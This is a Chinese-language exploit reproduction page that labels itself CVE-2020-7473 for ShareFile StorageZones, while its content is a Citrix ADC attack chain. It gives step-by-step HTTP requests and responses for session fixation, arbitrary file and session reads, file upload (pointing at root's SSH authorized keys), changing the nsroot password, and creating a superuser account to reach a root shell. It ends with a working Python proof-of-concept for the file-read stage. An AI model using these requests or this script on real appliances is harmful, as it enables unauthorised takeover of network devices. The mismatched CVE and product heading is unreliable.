跳转至

(CVE-2020-7473)Citrix 认证绕过getshell

一、漏洞简介

二、漏洞影响

ShareFile storage zones Controller 5.9.0

ShareFile storage zones Controller 5.8.0

ShareFile storage zones Controller 5.7.0

ShareFile StorageZones Controller 5.6.0

ShareFile StorageZones Controller 5.5.0

及ShareFile StorageZones Controller更早版本

三、复现过程

0x01 CreateSession

request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3

<appfwprofile><login></login></appfwprofile>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>

0x02 fix session

request

GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400

response

HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>

0x03 Get rand_key

request

GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400

response

HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;

</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>

note: var rand = \"181103693.1594540472072128\";

0x04 re-break Session

request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz

<appfwprofile><login></login></appfwprofile>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>

0x05 Read Dir

request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

<clipermission></clipermission>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream

...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....

0x06 Read Session

resquest

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

<clipermission></clipermission>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov  4 2019, 22:20:18   (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";

0x07 UploadFile Getshell

You Can Upload to /root/.ssh/authorized_key Note: Get rand_key & SESSID from file:sess_[32charactor]

request

POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}

response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8

{"errorcode":"0","message":"Done"}

0x08 ChangePassword && SSH

request

PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}

response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot@www.0-sec.org
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################

Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
 Done
 > shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
    The Regents of the University of California. All rights reserved.

root@localhost

0x09 CreateUser && SSH

request:CreateUser

POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}

response:CreateUser

HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}
response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot1@www.0-sec.org
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################

Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
    The Regents of the University of California. All rights reserved.

root@localhost#

poc

3.png

#!/usr/bin/env python

import requests
import sys
import string
import random
import json
from urllib.parse import quote



requests.packages.urllib3.disable_warnings()

def random_string(length=8):
    chars = string.ascii_letters + string.digits
    random_string = ''.join(random.choice(chars) for x in range(length))
    return random_string

def create_session(base_url, session):
    url = '{0}/pcidss/report'.format(base_url)

    params = {
        'type':'allprofiles',
        'sid':'loginchallengeresponse1requestbody',
        'username':'nsroot',
        'set':'1'
    }

    headers = {
        'Content-Type':'application/xml',
        'X-NITRO-USER':random_string(),
        'X-NITRO-PASS':random_string(),
    }

    data = '<appfwprofile><login></login></appfwprofile>'
    proxies = {"http":"http://127.0.0.1:8080/"}
    session.post(url=url, params=params, headers=headers, data=data, verify=False,proxies=proxies)
    return session

def fix_session(base_url, session):
    url = '{0}/menu/ss'.format(base_url)

    params = {
        'sid':'nsroot',
        'username':'nsroot',
        'force_setup':'1'
    }
    proxies = {"http":"http://127.0.0.1:8080/"}
    session.get(url=url, params=params, verify=False,proxies=proxies)

def get_rand(base_url, session):
    url = '{0}/menu/stc'.format(base_url)
    proxies = {"http":"http://127.0.0.1:8080/"}
    r = session.get(url=url, verify=False,proxies=proxies)

    for line in r.text.split('\n'):
        if 'var rand =' in line:
            rand = line.split('"')[1]
            return rand

def do_lfi(base_url, session, rand):
    url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)

    headers = {
        'Content-Type':'application/xml',
        'X-NITRO-USER':random_string(),
        'X-NITRO-PASS':random_string(),
        'rand_key':rand
    }

    data = '<clipermission></clipermission>'
    proxies = {"http":"http://127.0.0.1:8080/"}
    r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])

    if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
        print ("[+] Send Success!")
        print ("_"*80,"\n\n")
        print (r.text)
        print ("_"*80)
        while 1:
            PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
            url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
            r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
            if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
                print ("_"*80,"\n\n")
                print (r.text)
                print ("_"*80)
            # pass
    else:
        print ("[+] Error!")

def main(base_url):
    print ('[-] Creating session..')
    session = requests.Session()
    create_session(base_url, session)
    print ('[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))

    print('[-] Fixing session..')
    fix_session(base_url, session)

    print ('[-] Getting rand..')
    rand = get_rand(base_url, session)
    print ('[+] Got rand: {0}'.format(rand))

    print ('[-] Re-breaking session..')
    create_session(base_url, session)

    print ('[-] Getting file..')
    do_lfi(base_url, session, rand)

if __name__ == '__main__':
    # Slashes need to be urlencoded
    base_url = sys.argv[1]
    if base_url[-1] == '/':
        base_url = base_url[:-1]
    else:
        base_url = base_url
    # PAYLOAD='%2fetc%2fpasswd'
    PAYLOAD = quote(input("[+] Set File= "),"utf-8")
    main(base_url)